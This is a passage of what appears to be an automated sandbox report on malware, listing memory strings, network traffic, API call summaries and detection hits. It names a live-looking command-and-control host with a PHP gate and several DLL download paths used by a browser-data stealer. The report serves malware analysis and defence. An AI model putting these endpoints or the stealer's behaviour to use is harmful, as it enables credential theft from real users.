                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2378435053.00000000007A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.php
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.php%C
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.php2
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001004000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpApplication
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpEi?
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpH
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpH1?
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpHH?1
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpI~?
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpR?
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpUB
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpance
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpl0
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001004000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phprome
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpuBh
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.php~
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/freebl3.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/freebl3.dllrW
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/mozglue.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/mozglue.dlllW
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/msvcp140.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/msvcp140.dlln#
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/nss3.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/nss3.dllhH$
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/nss3.dllontent
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.000000000075E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/nss3.dllowser
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/nss3.dllved-By
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/softokn3.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/softokn3.dll(##
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/softokn3.dlln
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/softokn3.dllr#
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/softokn3.dllv$
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2378435053.00000000007A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/sqlite3.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/sqlite3.dllXWt
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/sqlite3.dllr
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/vcruntime140.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001004000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://dugong.ydns.eu/Local
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001004000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://dugong.ydns.eu/LocalMicrosoft
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu/W
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu/g.ydns.eu//kj2h34kj23h4/nss3.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.00000000010E7000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://dugong.ydns.eu/gtthfbsb2h.php3d6e242715944deffc86f8a0637d2d9888release
                                                Source: svchost.exe, 0000001B.00000003.2048843195.000001CA3FDB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                                Source: powershell.exe, 00000006.00000002.1367413665.00000000059EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1459848850.000001DDCD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1459848850.000001DDCD69A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2181027395.000000000655C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2375933907.0000000006041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2475582182.000000000598D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.d.Naye.
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                                                Source: powershell.exe, 00000043.00000002.2361011964.0000000004A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                                Source: powershell.exe, 00000006.00000002.1356644306.0000000004981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1410817500.000001DDBD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2152264674.00000000054F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2398882019.0000021441071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2295199412.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2361011964.0000000004921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                                Source: powershell.exe, 00000043.00000002.2361011964.0000000004A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                                Source: powershell.exe, 00000006.00000002.1370376809.00000000070C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.col
                                                Source: ILqcVeT.exe, 00000017.00000002.2551363792.000000006B99D000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                                                Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2550443033.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                                                Source: powershell.exe, 00000009.00000002.1410817500.000001DDBD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2398882019.0000021441071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                                Source: powershell.exe, 00000006.00000002.1356644306.0000000004981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2152264674.00000000054F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2295199412.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2361011964.0000000004921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&cta
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                                                Source: powershell.exe, 00000043.00000002.2475582182.000000000598D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                                Source: powershell.exe, 00000043.00000002.2475582182.000000000598D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                                Source: powershell.exe, 00000043.00000002.2475582182.000000000598D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                                Source: svchost.exe, 0000001B.00000003.2048843195.000001CA3FE19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                                                Source: svchost.exe, 0000001B.00000003.2048843195.000001CA3FDB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                                                Source: powershell.exe, 00000043.00000002.2361011964.0000000004A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                                Source: powershell.exe, 00000006.00000002.1356644306.0000000005166000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1410817500.000001DDBE10E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2152264674.0000000005B05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2361011964.0000000004F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                                                Source: powershell.exe, 00000006.00000002.1367413665.00000000059EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1459848850.000001DDCD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1459848850.000001DDCD69A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2181027395.000000000655C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2375933907.0000000006029000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2475582182.000000000598D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.Qb0WswhkLhoa
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001035000.00000040.00000001.01000000.00000013.sdmp, ILqcVeT.exe, 00000017.00000002.2385311293.0000000001054000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001035000.00000040.00000001.01000000.00000013.sdmp, ILqcVeT.exe, 00000017.00000002.2385311293.0000000001054000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001035000.00000040.00000001.01000000.00000013.sdmp, ILqcVeT.exe, 00000017.00000002.2385311293.0000000001054000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001035000.00000040.00000001.01000000.00000013.sdmp, ILqcVeT.exe, 00000017.00000002.2385311293.0000000001054000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001035000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50611
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 50636 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53889
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53928
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 64532 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59943
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50574
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50532
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 53659 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 53957 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64771
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64532
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 50532 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64776
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53659
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53736
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50549
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 50574 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 53928 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 64821 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64823
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64662
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64783
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64586
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64784
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 64771 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64821
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 50611 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53747
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50636
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 53889 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 59943 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 64662 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 64784 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 53747 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64756
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53957
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 64776 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53950
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 64823 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 64783 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 64756 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 64586 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 53950 -> 443
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                                                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:59943 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64532 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64586 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64662 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64756 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64821 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.11:64823 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:53736 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:53747 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:53889 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:53928 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:53950 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:53957 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:50532 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:50549 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:50574 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:50611 version: TLS 1.2
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C8EAFF
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C8ED6A
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C8EAFF
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BB61F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,20_2_00BB61F0
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00C7AA57
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00CA9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CA9576

                                                Spam, unwanted Advertisements and Ransom Demands

                                                barindex
                                                Send many emails (e-Mail Spam)
                                                Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 71

                                                System Summary

                                                barindex
                                                Malicious sample detected (through community Yara rule)
                                                Source: 0000003E.00000002.2594796685.000000000DB1E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
